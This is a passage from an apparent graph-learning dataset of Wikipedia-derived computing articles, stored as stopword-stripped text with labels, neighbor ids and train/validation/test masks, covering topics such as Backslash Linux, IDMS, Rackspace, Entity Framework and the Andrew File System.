    "text": "BackSlash_Linux:backslash linux backslash linux ubuntu debian-based operating system developed india kumar priyansh amd64 intel x64-based personal computers based free software every release operating system named characters 2013 disney film frozen since third major release backslash linux olaf backslash linux used custom version kde called backslash shell default user desktop backslash linux design hybrid resembles macos first glance kde bottom instead kde-based distribution ships many gnome-based applications moreover buttons title bar resemble macos arranged windows-like manner top bar resembles gnome first glance app opened displays universal menu bar looking similar macos unity development backslash linux started mid 2016 ubuntu-based compatible repositories ad packages uses discover software center handle installation/removal software user interface aims intuitive new users without consuming many resources backslash linux based ubuntu long term support releases developer actively maintains bugs security years even development continues next release three pre-release versions codenamed alpha beta gamma released first stable release still available download may 2017 taken website first stable version backslash linux backslash linux anna published 2 november 2016 based ubuntu 14.04 ran linux kernel 4.2 ran cinnamon desktop environment extra plugins plank dock provide new look support download option version still available backslash linux website article also published linux.com introducing backslash linux backslash linux anna complete system providing end-users types needed daily use software notable applications included font viewer pdf reader simple scan deluge bittorrent client dropbox google chrome google earth pidgin im skype wps office vlc media player clementine screen reader gdebi package manager wine pre-installed order support windows based applications games second release backslash linux published 20 december 2016 called backslash linux elsa elsa built atop ubuntu long-term support release — ubuntu 16.04 ran flagship desktop environment elementary os pantheon lot applications used backslash linux anna dropped release cut iso size also added lot additional applications besides core applications shipped elementary os replaced epiphany browser google chrome many additional utilities like skype wine deluge bittorrent client dictionary also shipped out-of-the-box inclusion gnome boxes virtualisation desktops another time-saver backslash linux elsa embarked inclusion many utilities like backups dvd burner teamviewer synaptic package manager pidgin im replaced empathy im also included firewall full libreoffice suite addition modem manager noticed helpful managing external modem cards albert present search companion backslash elsa easily activated using meta+space shortcut key tweaking desktop changing themes colors cursors also present desktop present pantheon default also introduced active desktop right-click options pantheon desktop backslash linux olaf third major current release backslash linux published 9 may 2017 introduced 150+ new features last versions backslash linux based ubuntu 16.04 ran backslash shell customised kde desktop due heavily modified beautiful desktop gained much attention received much praise earlier versions version backslash linux removed applications cut iso size also brought many refinements google chrome replaced open-source chromium wine upgraded version 2.0.1 applications like skype firewall modem manager dvd burner dropbox empathy im gnome boxes teamviewer deluge dictionary present earlier version backslash linux dropped version albert search companion replaced krunner search libreoffice lost position wps office back backslash linux series release olaf thunderbird also included version better email experience simple idea include best apps available instead kde-specific apps reason see gnome apps like calendar disks maps release backslash linux olaf also introduced full-screen applauncher resembled launchpad macos fork discontinued application slingshot reviewing backslash linux olaf souris procambodian said think best build distro feels complete ’ need much time config cause ’ everything working box backslash linux kristoff released public beta 13 august 2017 adding features like fingerprint hwe kernel support linux distro world followed deepin linux also added fingerprint support deepin 15.5 released 30 november 2017 stable release backslash linux kristoff made christmas december 25 2017 builds upon previous release backslash linux olaf fixing almost bugs also introduces backslash shell v2.0 performance improvements highly worked also introduces new app called multiview system optimizer installer issues fixed ui redesigned gtk+ support greatly worked backslash linux kristoff also supports fingerprint recognition lockscreen terminal authentication app authentications multitouch gesture support also implemented addition wine redshift night light also introduced better temperature controls additional components include sidebar better notification audio network management hardware-enabled hwe kernel includes support snaps new login screen video background also cover flow task switcher also includes desktop cube animation switching multiple virtual desktops applications included geary apache openoffice gparted dolphin file manager modem manager synaptic package manager vlc media player others security backslash based ubuntu security software updates provided canonical ltd. default programs run standard user privileges administrator privileges given whenever required increased security sudo tool used assign temporary privileges performing administrative tasks allows root account remain locked helps prevent inexperienced users inadvertently making catastrophic system changes opening security holes network ports closed default prevent hacking built-in firewall allows end-users install network servers control access gui available configure backslash compiles packages using gnu compiler collection features position-independent code buffer overflow protection hardening computing software backslash supports full disk encryption well encryption home private directories backslash linux installation simple fully graphical backslash linux booted run usb flash drive pc capable booting usb drive option saving settings flash drive ubuntu live usb creator program available install ubuntu-based distribution usb drive windows program unetbootin allows backslash linux usb burning installation supports logical volume manager lvm automatic partitioning disk encryption utf-8 default character encoding supports variety non-roman type script unicode backslash linux also released two official flavours mate gnome also server edition operating system soon development support versions flavous server edition discontinued development focused mainstream release",
    "neighbors": [
      6797,
      4623,
      3859,
      11418,
      10525,
      8998,
      7983,
      823,
      7483,
      3649,
      5067,
      2383,
      1632,
      1121,
      485,
      7914,
      5356,
      5363,
      8954,
      5755
    ],
    "mask": "None"
  },
  {
    "node_id": 3816,
    "label": 1,
    "text": "IDMS:idms ca idms integrated database management system primarily network model codasyl database management system mainframes first developed b.f. goodrich later marketed cullinane database systems renamed cullinet 1983 since 1989 product owned computer associates ca technologies renamed advantage ca-idms later simply ca idms roots idms go back pioneering database management system called integrated data store ids developed general electric team led charles bachman first released 1964 early 1960s ids taken original form computer group b.f. goodrich chemical division re-written language called intermediate system language isl isl designed portable system programming language able produce code variety target machines since isl actually written isl able ported machine architectures relative ease produce code would execute chemical division computer group given thought selling copies idms companies told management software products business eventually deal struck john cullinane buy rights market product cullinane required remit royalties back b.f. goodrich add-on products listed billed separate products even mandatory core idms product work sometimes confused customers original platforms ge 235 computer ge datanet-30 message switching computer later product ported ibm mainframes dec icl hardware ibm-ported version runs ibm mainframe systems system/360 system/370 system/390 zseries system z9 mid-1980s claimed 2,500 idms licenses sold users included strategic air command ford canada ford europe jaguar cars clarks shoes uk axa/ppp mapfre royal insurance tesco manulife hudson bay company cleveland clinic bank canada general electric aetna bt uk version use decsystem series computers sold dec marketed dbms10 later dbms20 1976 source code licensed icl ported software run 2900 series mainframes subsequently also older 1900 range icl continued development software independently cullinane selling original ported product name icl 2900 idms enhanced version idmsx form used many large uk users example pay-as-you-earn system operated inland revenue many idmsx systems uk government still running 2013 early mid-1980s relational database management systems started become popular encouraged increasing hardware power move minicomputers client–server architecture relational databases offered improved development productivity codasyl systems traditional objections based poor performance slowly diminishing cullinet attempted continue competing ibm db2 relational databases developing relational front-end range productivity tools included automatic system facility asf made use pre-existing idms feature called lrf logical record facility asf fill-in-the-blanks database generator would also develop mini-application maintain tables difficult judge whether features may successful extending selling life product made little impact long term users stayed idms primarily interested high performance relational capabilities widely recognized helped high-profile campaign e. f. codd father relational model significant difference relational database network database relational veneer 1989 computer associates continued cullinet acquisition development released release 12.0 full sql 1992-93 nowadays ca technologies actively markets supports ca idms enhanced idms subsequent releases tcp/ip support two-phase commit support xml publishing ziip specialty processor support web-enabled access combination ca idms server sql option gui database administration via ca idms visual dba tool ca-idms systems today still running businesses worldwide many customers opted web-enable applications via ca-idms sql option part ca technologies dual database strategy one sophisticated features idms built-in integrated data dictionary idd idd primarily developed maintain database definitions idms database dbas database administrators users interfaced idd using language called data dictionary definition language dddl idd also used store definitions code products idms family ads/online idms-dc idd power extensible could used create definitions anything companies used develop in-house documentation data model offered users codasyl network model main structuring concepts model records sets records essentially follow cobol pattern consisting fields different types allows complex internal structure repeating items repeating groups distinctive structuring concept codasyl model set confused mathematical set codasyl set represents one-to-many relationship records one owner many members fact record member many different sets key factor distinguishes network model earlier hierarchical model records set belongs named set type different set types model different logical relationships sets fact ordered sequence records set used convey information record participate owner member number sets records identity identity represented value known database key idms codasyl implementations database key directly related physical address record disk database keys also used pointers implement sets form linked lists trees close correspondence logical model physical implementation strictly necessary part codasyl model characteristic successful implementations responsible efficiency database retrieval also makes operations database loading restructuring rather expensive records accessed directly database key following set relationships direct access using key values initially direct access hashing mechanism known codasyl model calc access idms calc access implemented internal set linking records share hash value owner record occupies first bytes every disk page subsequent years versions idms added ability access records using btree-like indexes idms organizes databases series files files mapped pre-formatted so-called areas areas subdivided pages correspond physical blocks disk database records stored within blocks dba allocates fixed number pages file area dba defines records stored area details stored idms intersperses special space-allocation pages throughout database pages used keep track free space available page database reduce i/o requirements free space tracked pages free space area falls 30 four methods available storing records idms database direct sequential calc via fujitsu/icl idmsx version extends two methods page direct random direct mode target database key specified user stored close possible db key actual db key record stored returned application program sequential placement confused indexed sequential simply places new record end area option rarely used calc uses hashing algorithm decide place record hash key provides efficient retrieval record entire calc area preformatted header consisting special calc owner record hashing algorithm determines page number physical disk address determined record stored page near possible linked header record page using calc set calc records linked page calc owner record using single link-list pointers calc owner located page header thus owns set records target particular page whether records stored page case overflow another page calc provides extremely efficient storage retrieval idms retrieve calc record 1.1 i/o operations however method cope well changes value primary key expensive reorganization needed number pages needs expanded work-around expand area run application program scans area sequentially calc record uses modify verb update record results calc record connected calc set correct target page calculated area new page range downside method vanishingly calc records target pages navigating page calc set likely involve many io operations result recommended use work-around extreme circumstances performance suffer via placement attempts store record near owner particular set usually records clustered physical page owner leads efficient navigation record accessed following set relationship via allows records stored different idms area stored separately owner yet remain clustered together efficiency within idmsx may also offset owner set number pages page direct idmsx similar direct mode however target database page number specified record connected calc chain page random idmsx allocates target page number record occurrence stored using calc algorithm either uses key within record case un-keyed random uses date time storage seed calc algorithm sets generally maintained linked lists using database key pointer every record includes forward link next record database designer choose whether include owner pointers prior pointers provided navigation directions slower versions idms subsequently included ability define indexes either record indexes allowing records located knowledge secondary key set indexes allowing members set retrieved key value idmsx page direct random placement records typically used conjunction record indexes described indexes subject placement rules either direct really means calc using index id key calc idms many non-profit user associations across globe composed information technology professionals use and/or support ca idms related products include",
    "neighbors": [
      4998,
      3594,
      11024,
      11153,
      284,
      10413,
      10286,
      7983,
      7733,
      9397,
      10040,
      1219,
      11472,
      479,
      7650,
      6627,
      868,
      10471,
      2168,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 3817,
    "label": 2,
    "text": "Jonas_Öberg:jonas öberg jonas öberg born 22 november 1977 norrköping sweden free open-source software activist describing instigator world free worked free software foundation europe gnu project fscons creative commons shuttleworth foundation started develop software 1991 installed first gnu/linux operating system 1993 eventually joined webmaster gnu project late 1990s spent time mit ai labs met richard stallman others free software foundation joining bazaar conference new york since 2002 award committee free software foundation free software awards 2001 founding member free software foundation europe took role vice president 22 november 2001 former vice president loïc dachary took step back focus gnu savannah worked creative commons several years including running course fundraising peer peer university became first regional coordinator europe 2011 work organisation eventually led position fellow shuttleworth foundation work focus creating tools prototypes embedding metadata licensing attribution requirements digital works company commons machinery featured one 12 winners tech stars 2014 competition european commission neelie kroes digital agenda 19th-century wooden house north sweden continuously renovating lives outside stockholm gnesta sweden married julia velkova media researcher member internet society bulgaria marriage took place ice hotel sweden 8 march 2013",
    "neighbors": [
      2050,
      2180,
      11654,
      11659,
      4493,
      1939,
      802,
      3618,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      8147,
      3674,
      2010,
      10464,
      743,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "Test"
  },
  {
    "node_id": 3818,
    "label": 3,
    "text": "Acer_PICA:acer pica m6100 pica system logic chipset designed acer laboratories introduced 1993 pica stands performance-enhanced input-output cpu architecture based jazz architecture developed microsoft supported mips technologies r4000 r4400 microprocessors chipset designed computers run windows nt therefore used arc firmware boot windows nt chipset consisted six chips cpu secondary cache controller buffer i/o cache bus controller memory controller two data buffers pica used acer formula 4000 personal workstation nec sold oem name riscstation image",
    "neighbors": [
      6854,
      6252,
      7215,
      8976,
      2452,
      6942,
      6879
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3819,
    "label": 7,
    "text": "Rackspace:rackspace rackspace inc. american managed cloud computing company based windcrest texas suburb san antonio company also offices australia united kingdom switzerland netherlands germany singapore mexico hong kong rackspace data centers operating texas chicago kansas city virginia united kingdom germany australia hong kong company rackspace email division operates blacksburg va offices located austin texas 2016 rackspace closed san francisco office rackspace became public 2008 2016 purchased taken private apollo global management llc 1996 richard yoo started small internet service provider called cymitar network systems garage apartment san antonio texas company began application development work addition offering basic internet access web hosting 1997 yoo brought dirk elmendorf company began develop internet applications primary business company re-formed cymitar technology group cymitar technology group grew patrick condon recruited california joined team 1998 coincidentally three company founders students one time trinity university san antonio although founders began application developers end users found companies either know want host applications founders wanted focus application development–not hosting–but unable find opportunity outsource hosting work eventually founders realized would better create product serve hosting need launch company rackspace launched october 1998 richard yoo ceo although hosting companies focused technology end hosting rackspace created fanatical support offering focus service support march 28 2000 rackspace received funding lead investor norwest venture partners sequoia capital george j still jr. managing partner norwest subsequently joined board directors 2008 rackspace moved headquarters building occupied datapoint corporation then-unoccupied windsor park mall windcrest texas rackspace chairman graham weston owned montgomery ward building mall 2006 sold developer city windcrest purchased south mall create residential retail complex facility located next roosevelt high school many roosevelt students intern rackspace fortune top 100 best companies work 2008 placed rackspace first year rackspace applied consideration company praised transparency regular open book meetings held top level leaders share in-depth financial information employees 2011 2013 company named one top 100 places work fortune august 8 2008 rackspace opened trading new york stock exchange ticker symbol rax initial public offering ipo raised 187.5 million initial public offering included 15,000,000 shares common stock price 12.50 per share ipo well public market lost 20 initial price almost immediately around 3:45pm cst december 18 2009 rackspace experienced outage customers using dallas–fort worth data center – including rackspace cloud september 8 2010 rackspace received national attention decided discontinue providing web hosting service one customers dove world outreach center reaction dove world pastor terry jones plan burn several copies qur'an anniversary september 11th attacks rackspace claims violated company policy move came criticism notably terry jones described indirect attack freedom speech others questioned appropriateness rackspace action stating absolutely reason web hosts editorial policy gives jones attention makes look persecuted june 3 2011 rackspace intervened application queensland host rack servers trademark business name australia may 26 2013 author bill schley book 'the unstoppables inspired culture rackspace became new york times bestseller may 15 2014 rackspace hired morgan stanley evaluate strategic options including selling merging technology companies october 2014 rackspace announced would sell support google work apps business customers august 2016 confirmed apollo global management reached agreement buy company 4.3 billion sale completed november 2016 rackspace officially ended trading new york stock exchange november 3 2016 may 2017 ceo taylor rhodes announced leaving company may 16 work smaller private company different city may 2017 rackspace named joe eazor new ceo april 2019 company named kevin jones new ceo october 22 2008 rackspace announced purchasing cloud storage provider jungle disk vps provider slicehost february 16 2012 rackspace acquired sharepoint911 microsoft sharepoint consulting company based cincinnati ohio may 25 2017 rackspace announced agreement acquire tricore solutions september 11 2017 rackspace announced plans acquire datapipe september 17 2018 rackspace announced acquired relationedge acquisitions include cloudkick anso labs mailgun objectrocket exceptional cloud services zerovm rackspace launched serverbeach san antonio january 2003 lower-cost alternative dedicated servers designed technology hobbyists want flexibility reliability richard yoo catalyst startup serverbeach bandwidth colocation provider peer 1 hosting known cogeco peer 1 purchased serverbeach october 2004 7.5 million peer 1 hosting entered uk managed hosting market january 2009 serverbeach brand competes directly uk arm rackspace run dominic monkhouse former managing director rackspace limited october 2006 mosso inc. launched experimented white-labeling hosting services eventually division became foundation rackspace cloud computing offering october 1 2007 rackspace acquired webmail.us private e-mail hosting firm located blacksburg va originally branded mailtrust may 20 2009 became part newly formed cloud office division rackspace october 22 2008 rackspace acquired slicehost provider virtual servers jungle disk provider online backup software services rackspace announced march 8 2017 plans expansion portfolio include managed service google cloud platform program began beta testing july 18 2017 planned full offering late 2017 rackspace partnered google customer reliability engineering group google site reliability engineers ensure cloud applications run speed reliability google widely-used products 2010 rackspace contributed source code cloud files product openstack project apache license become openstack object storage component april 2012 rackspace announced would implement openstack compute underlying technology cloud servers product change introduced new control panel well add-on cloud services offering databases server monitoring block storage virtual networking 2015 two rackspace executives elected board openstack foundation february 2016 interview cto john engates stated rackspace use openstack power public private cloud",
    "neighbors": [
      1539,
      526,
      10265,
      5662,
      5666,
      9766,
      39,
      3121,
      5681,
      5689,
      5697,
      10820,
      7750,
      4683,
      3660,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      8295,
      7280,
      8826,
      2170,
      4236,
      10893,
      6307,
      1705,
      170,
      2217,
      5295,
      176,
      9906,
      7352,
      4289,
      3269,
      8921,
      6367,
      2795,
      9974,
      253,
      8446,
      8451,
      272,
      8465,
      2328,
      4377,
      8986,
      1309,
      11038,
      4388,
      6444,
      8495,
      1840,
      11070,
      8515,
      3909,
      3405,
      4429,
      11597,
      7512,
      9048,
      4958,
      3428,
      10090,
      8044,
      7022,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      5024,
      6565,
      2487,
      5047,
      10681,
      448,
      11201,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      8170,
      7660,
      8191
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3820,
    "label": 2,
    "text": "Remote_direct_memory_access:remote direct memory access computing remote direct memory access rdma direct memory access memory one computer another without involving either one operating system permits high-throughput low-latency networking especially useful massively parallel computer clusters rdma supports zero-copy networking enabling network adapter transfer data wire directly application memory application memory directly wire eliminating need copy data application memory data buffers operating system transfers require work done cpus caches context switches transfers continue parallel system operations reduces latency message transfer however strategy presents several problems related fact target node notified completion request single-sided communications 2018 rdma achieved broader acceptance result implementation enhancements enable good performance ordinary networking infrastructure example roce rdma converged ethernet able run either lossy lossless infrastructure addition iwarp enables ethernet rdma implementation physical layer using tcp/ip transport combining performance latency advantages rdma low-cost standards-based solution rdma consortium dat collaborative played key roles development rdma protocols apis consideration standards groups internet engineering task force interconnect software consortium hardware vendors started working higher-capacity rdma-based network adapters rates 100 gbit/s reported software vendors red hat oracle corporation support apis latest products engineers started developing network adapters implement rdma ethernet red hat enterprise linux red hat enterprise mrg support rdma microsoft supports rdma windows server 2012 via smb direct vmware esxi product also supports rdma 2015 common rdma implementations include virtual interface architecture rdma converged ethernet roce infiniband omni-path iwarp",
    "neighbors": [
      3328,
      5472,
      3042,
      2723,
      8353,
      9220,
      710,
      582,
      8424,
      7499,
      10924,
      10734,
      7983,
      1776,
      9455,
      11193,
      4505,
      2395
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3821,
    "label": 1,
    "text": "Entity_Framework:entity framework entity framework ef open source object-relational mapping orm framework ado.net part .net framework since entity framework version 6 separated .net framework entity framework set technologies ado.net support development data-oriented software applications architects developers data-oriented applications typically struggled need achieve two different objectives must model entities relationships logic business problems solving must also work data engines used store retrieve data data may span multiple storage systems protocols even applications work single storage system must balance requirements storage system requirements writing efficient maintainable application code entity framework enables developers work data form domain-specific objects properties customers customer addresses without concern underlying database tables columns data stored entity framework developers work higher level abstraction deal data create maintain data-oriented applications less code traditional applications first version entity framework efv1 included .net framework 3.5 service pack 1 visual studio 2008 service pack 1 released 11 august 2008 version widely criticized even attracting 'vote confidence signed approximately one thousand developers second version entity framework named entity framework 4.0 efv4 released part .net 4.0 12 april 2010 addressed many criticisms made version 1 third version entity framework version 4.1 released april 12 2011 code first support refresh version 4.1 named entity framework 4.1 update 1 released july 25 2011 includes bug fixes new supported types version 4.3.1 released february 29 2012 updates like support migration version 5.0.0 released august 11 2012 targeted .net framework 4.5 also version available .net framework 4 without runtime advantages version 4 version 6.0 released october 17 2013 open source project licensed apache license v2 like asp.net mvc source code hosted github using git version number improvements code-first support microsoft decided modernize componentize bring .net cross-platform linux osx elsewhere meaning next version entity framework would complete rewrite 27 june 2016 released entity framework core 1.0 alongside asp.net core 1.0 .net core 1.0 originally named entity framework 7 renamed highlight complete rewrite rather incremental upgrade n't replace ef6 ef core 1.0 licensed apache license v2 built entirely open github ef core 1.0 shares conceptual similarities prior versions entity framework completely new codebase designed efficient powerful flexible extensible run windows linux osx support new range relational nosql data stores ef core 2.0 released 14 august 2017 along visual studio 2017 15.3 asp.net core 2.0 architecture ado.net entity framework bottom consists following entity data model edm specifies conceptual model csdl data using modelling technique called entity data model extended version entity-relationship model data model primarily describes entities associations participate edm schema expressed schema definition language sdl application xml extended markup language addition mapping msl elements conceptual schema csdl storage schema ssdl must also specified mapping specification also expressed xml visual studio also provides entity designer visual creation edm mapping specification output tool xml file *.edmx specifying schema mapping edmx file contains ef metadata artifacts csdl/msl/ssdl content three files csdl msl ssdl also created edited hand entity data model wizard visual studio initially generates one-to-one 1:1 mapping database schema conceptual schema cases relational schema elements composed tables primary foreign keys gluing related tables together contrast entity types define conceptual schema data entity types aggregation multiple typed fields – field maps certain column database – contain information multiple physical tables entity types related independent relationships physical schema related entities also exposed similarly – via field whose name denotes relation participating accessing instead retrieving value column database traverses relationship returns entity collection entities related entity types form class objects entities conform entities instances entity types entities represent individual objects form part problem solved application indexed key example converting physical schema described two entity types logical schema mapping physical schema represented entity data model edm specified xml file ado.net entity framework uses edm actually perform mapping letting application work entities internally abstracting use ado.net constructs like dataset recordset ado.net entity framework performs joins necessary entity reference information multiple tables relationship traversed entity updated traces back table information came issues sql update statements update tables data updated ado.net entity framework uses esql derivative sql perform queries set-theoretic operations updates entities relationships queries esql required translated native sql flavor underlying database entity types entity sets form logical edm schema exposed anything ado.net entity framework includes object service presents entities objects elements relationships exposed properties thus entity objects front-end instances edm entity types lets object oriented languages access use similarly front-ends created expose entities via web services e.g. wcf data services xml used entities serialized persistence storage over-the-wire transfer entities** instances entitytype represent individual instances objects customer orders information pertains identity entity defined entity type instance sense entity type defines class entity belongs also defines properties entity properties describe aspect entity giving name type properties entity type ado.net entity framework fully typed fully compatible type system used dbms system well common type system .net framework property simpletype complextype multi-valued well entitytype belong namespace entitykey property uniquely identifies instance entity type different property types distinguished follows entity instances housed entitycontainers per-project containers entities project one named entitycontainers reference entities across multiple namespaces entity types multiple instances one entity type stored collections called entitysets one entity type multiple entitysets edm primitive types simple types two entity types related either association relation containment relation example shipment billed customer association whereas order contains order details containment relation containment relation also used model inheritance entities relation two entity types specified relationship type instances called relationships relate entity instances future releases kinds relationship types composition identification may introduced relationship types characterized degree arity count entity types relate multiplicity however initial release ado.net entity framework relationships limited binary degree two bi-directional relationship multiplicity defines many entity instances related together based multiplicity relationships either one-to-one one-to-many many-to-many relationships entities named name called role defines purpose relationship relationship type also operation action associated allows action performed entity event action performed related entity relationship specified take action operation done related entity example deleting entity forms part relation ondelete operation actions taken association relationships different semantics either ends different actions specified either end ado.net entity framework uses xml based data definition language called schema definition language sdl define edm schema sdl defines simpletypes similar cts primitive types including string int32 double decimal guid datetime among others enumeration defines map primitive values names also considered simple type enumerations supported framework version 5.0 onwards complextypes created aggregation types collection properties types define entity type definition written ebnf grammar facets used describe metadata property whether nullable default value also cardinality property i.e. whether property single valued multi valued multiplicity “ 1 ” denotes single valued property “ ” means multi-valued property example entity denoted sdl relationship type defined specifying end points multiplicities example one-to-many relationship customer orders defined ado.net entity framework uses variant structured query language named entity sql aimed writing declarative queries updates entities entity relationships – conceptual level differs sql explicit constructs joins edm designed abstract partitioning data across tables querying conceptual model facilitated entityclient classes accepts entity sql query query pipeline parses entity sql query command tree segregating query across multiple tables handed entityclient provider like ado.net data providers entityclient provider also initialized using connection object addition usual parameters data store authentication info requires sdl schema mapping information entityclient provider turn turns entity sql command tree sql query native flavor database execution query returns entity sql resultset limited tabular structure unlike ado.net resultsets entity sql enhances sql adding intrinsic support canonical functions supported entity framework compliant data providers used entity sql query also extension methods linq entities translated canonical functions independent specific database ado.net data provider receives function translates desired sql statement dbmss equivalent functionality set standard embedded functions also differences accuracy calculations therefore canonical functions supported databases canonical functions return results linq entities provider allows linq used query various rdbms data sources several database server specific providers entity framework support available entity framework v4 new methods executestorequery executestorecommand added class objectcontext visual studio feature called visualizer linq query written visual studio viewed native sql using visualizer debug session visualizer linq entities object query targeting rdbms available via visualstudiogallery",
    "neighbors": [
      10243,
      3080,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      632,
      1656,
      5754,
      1146,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      4776,
      10413,
      10414,
      3763,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      10991,
      2804,
      4853,
      9467,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      315,
      5952,
      1347,
      1348,
      844,
      847,
      1366,
      10079,
      11616,
      2401,
      2943,
      10624,
      9609,
      9612,
      7064,
      9114,
      3997,
      10654,
      8607,
      11683,
      4010,
      1964,
      10157,
      6584,
      2493,
      7629,
      11221,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "Train"
  },
  {
    "node_id": 3822,
    "label": 7,
    "text": "Citrix_Virtual_Apps:citrix virtual apps citrix virtual apps formerly winframe metaframe presentation server xenapp application virtualization software produced citrix systems allows windows applications accessed via individual devices shared server cloud system citrix virtual apps application virtualization software delivers centrally-hosted windows applications local devices without necessity installing flagship product citrix formerly known names winframe metaframe presentation server citrix virtual apps software uses flexcast management architecture fma proprietary architecture citrix virtualization products delivers individual applications opposed entire desktops devices also used citrix workspace deliver apps part complete virtual desktop environment citrix virtual apps windows applications used devices typically could run including macintosh computers mobile devices google chromebooks conversely enables otherwise incompatible apps run windows desktops citrix virtual apps accessed devices via citrix receiver software delivered on-premises data centers public private hybrid clouds precursor virtual apps called winframe multi-user operating system based windows nt 3.51 released 1995 winframe one first products distributed citrix stage product development citrix systems licensed windows nt 3.51 base operating system microsoft core development citrix delivered multiwin engine allowed multiple users logon execute applications winframe server citrix later license multiwin technology microsoft forming basis microsoft terminal services repackaged versions windows 95 citrix winframe client included also available citrix metaframe superseded winframe 1998 product renamed several times became metaframe xp 2002 metaframe xp presentation server 2003 rebranded presentation server 2005 products focused remote access applications server-based computing 2008 product renamed xenapp xen taken company acquisition xensource 2007 2010 2012 citrix issued two updates xenapp xenapp 6 launched 2010 included new central management console called appcenter 2012 xenapp 6.5 released update included new feature called instant app access aimed reduce application launch time 2013 version 7.0 released update combined xendesktop xenapp one application called xendesktop flex management architecture fma prior versions xenapp used company independent management architecture ima 2014 version 7.5 released xenapp separate xendesktop also built fma 2018 xenapp rebranded citrix virtual apps",
    "neighbors": [
      641,
      4194,
      5732,
      5535,
      4490,
      6797,
      7983,
      8466,
      9970,
      4309,
      5371,
      2399
    ],
    "mask": "Test"
  },
  {
    "node_id": 3823,
    "label": 9,
    "text": "Paul_Hudak:paul hudak paul raymond hudak july 15 1952 – april 29 2015 american professor computer science yale university best known involvement design haskell programming language well several textbooks haskell computer music chair department also master saybrook college died april 29 2015 leukemia",
    "neighbors": [
      4769,
      4578,
      3876,
      4392,
      6536,
      8116,
      1783,
      2938
    ],
    "mask": "None"
  },
  {
    "node_id": 3824,
    "label": 3,
    "text": "GScube:gscube gscube hardware tool released sony intended use cgi production houses consisting custom variant sixteen playstation 2 motherboards running parallel playstation 2 ps2 video game console manufactured sony computer entertainment released march 4 2000 japan followed north america europe later year unveiled year siggraph name gscube short graphics synthesizer cube used two projects film incarnation resident evil according sources sent back sony japan subsequently dismantled used prototyping visual rendering final fantasy matrix antz well flight simulator although gscube good rendering capability major bottleneck connecting external computers transfer content",
    "neighbors": [
      4098,
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 3825,
    "label": 4,
    "text": "Dmitri_Alperovitch:dmitri alperovitch dmitri alperovitch russian-american computer security industry executive co-founder chief technology officer crowdstrike august 2011 vice president threat research mcafee published operation shady rat report suspected chinese intrusions least 72 organizations including defense contractors businesses worldwide united nations international olympic committee alperovitch born moscow 1980 1990 parents moved maryland nuclear safety training program stayed behind ussr — law — make sure parents defect 1994 whole family moved chattanooga alperovitch earned b.s computer science 2001 m.s information security 2003 georgia institute technology alperovitch worked number computer security startups late 1990s early 2000s including e-mail security startup ciphertrust one leading inventors trustedsource reputation system upon acquisition ciphertrust secure computing 2006 led research team launched software-as-a-service business company alperovitch took vice president threat research mcafee company acquired secure computing 2008 january 2010 led investigation operation aurora chinese intrusions google two dozen companies subsequently led investigation night dragon espionage operation western multinational oil gas companies traced song zhiyue chinese national living heze city shandong province late 2011 along entrepreneur george kurtz gregg marston dmitri alperovitch co-founded became chief technology officer crowdstrike security technology company focused helping enterprises governments protect intellectual property secrets cyberespionage cybercrime crowdstrike brought board senior fbi executives shawn henry former executive assistant director ead fbi criminal cyber response services branch steve chabinsky former deputy assistant director fbi cyber division crowdstrike received 256 million funding warburg pincus accel partners google capital alperovitch awarded prestigious federal 100 award contributions u.s. federal information security recognized 2013 2015 one washingtonian magazine tech titans accomplishments field cybersecurity august 2013 selected one mit technology review top 35 innovators 35 award previously larry page sergey brin mark zuckerberg 2016 politico magazine featured one “ politico 50 ” influential thinkers doers visionaries transforming american politics 2017 fortune magazine listed alperovitch 40 40 annual ranking influential young people business along emmanuel macron mark zuckerberg serena williams senior fellow atlantic council think tank named december 2013 one foreign policy top 100 leading global thinkers along angela merkel john kerry ben bernanke jeff bezos",
    "neighbors": [
      704,
      8288,
      1251,
      176,
      4625,
      9817,
      91,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 3826,
    "label": 6,
    "text": "Andrew_File_System:andrew file system andrew file system afs distributed file system uses set trusted servers present homogeneous location-transparent file name space client workstations developed carnegie mellon university part andrew project originally named vice afs named andrew carnegie andrew mellon primary use distributed computing afs several benefits traditional networked file systems particularly areas security scalability one enterprise afs deployment morgan stanley exceeds 25,000 clients afs uses kerberos authentication implements access control lists directories users groups client caches files local filesystem increased speed subsequent requests file also allows limited filesystem access event server crash network outage afs uses weak consistency model read write operations open file directed locally cached copy modified file closed changed portions copied back file server cache consistency maintained callback mechanism file cached server makes note promises inform client file updated someone else callbacks discarded must re-established client server network failure including timeout re-establishing callback involves status check require re-reading file consequence file locking strategy afs support large shared databases record updating within files shared client systems deliberate design decision based perceived needs university computing environment example original email system andrew project andrew message system single file per message used like maildir rather single file per mailbox like mbox see afs buffered i/o problems handling shared databases significant feature afs volume tree files sub-directories afs mountpoints links afs volumes volumes created administrators linked specific named path afs cell created users filesystem may create directories files usual without concern physical location volume volume may quota assigned order limit amount space consumed needed afs administrators move volume another server disk location without need notify users operation even occur files volume used afs volumes replicated read-only cloned copies accessing files read-only volume client system retrieve data particular read-only copy point copy becomes 